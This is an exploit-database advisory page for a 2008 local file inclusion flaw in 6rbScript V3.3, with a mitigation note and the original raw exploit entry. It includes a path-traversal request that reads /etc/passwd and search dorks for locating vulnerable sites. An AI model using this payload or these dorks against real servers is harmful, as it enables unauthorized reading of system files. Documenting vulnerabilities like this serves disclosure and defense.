header-logo
Suggest Exploit
vendor:
6rbScript V3.3
by:
Stack
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: 6rbScript V3.3
Affected Version From: V3.3
Affected Version To: V3.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

6rbScript V3.3 Local file Vulnerability

A vulnerability in 6rbScript V3.3 allows an attacker to include local files on the server. This is possible due to the lack of input validation and the fact that magic quotes and open_basedir are disabled on the server. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server, such as site.il/section.php?name=../../../../etc/passwd.

Mitigation:

Input validation should be implemented to prevent attackers from including local files on the server. Additionally, magic quotes and open_basedir should be enabled on the server.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
|                                                   |
|
| script : www.6rbscript.com
|
| DorK   : inurl:"section.php?name=singers"
| dorK   : Powered By 6rbScript V3.3
|___________________________________________________|
 
Author : Stack
 
Expl need magic quote = off & open basdir = off in many server
 
site.il/section.php?name=../../../../etc/passwd

# milw0rm.com [2008-09-21]

Navigation

Suggest Exploit

Services By CQR